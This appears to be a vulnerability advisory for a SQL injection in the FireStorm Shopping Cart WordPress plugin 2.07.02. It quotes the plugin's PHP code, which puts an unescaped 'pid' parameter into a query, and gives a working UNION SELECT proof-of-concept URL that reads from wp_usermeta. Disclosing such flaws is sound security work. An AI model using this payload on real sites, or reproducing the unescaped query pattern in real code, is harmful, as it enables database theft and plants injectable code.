FireStorm Shopping Cart eCommerce Plugin 2.07.02 for WordPress

Homepage:

https://wordpress.org/plugins-wp/fs-shopping-cart/

Description:

$_POST[ ‘pid’ ] is not escaped. Url is accessible for administrator user.

Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0

File / Code:

… /wp-content/plugins/fs-shopping-cart/includes/admin_produtcs.php

echo '<div class="wrap">';
if (isset($_GET['pid'])) {
   echo '<h2>Editing '.$wpdb->get_var("SELECT products_part_number FROM ".$wpdb->prefix."fssc_products WHERE products_id = ".$_GET['pid']).' <a href="admin.php?page=fssc-products&f=add" class="add-new-h2">Add New</a></h2>';
   echo fssc_products_sub_links($_GET['fp'], $_GET['f'], $_GET['cid'], $_GET['pid']);
} else {
   echo '<h2>Products <a href="admin.php?page=fssc-products&f=add" class="add-new-h2">Add New</a></h2>';
}

Proof of Concept:

sqlinjectionfs-shopping
Login with administrator user;

Url with exploit: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+meta_value+FROM+wp_usermeta+WHERE+umeta_id%3D16

Timeline:

  • 10/11/2016 – Discovered

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to Top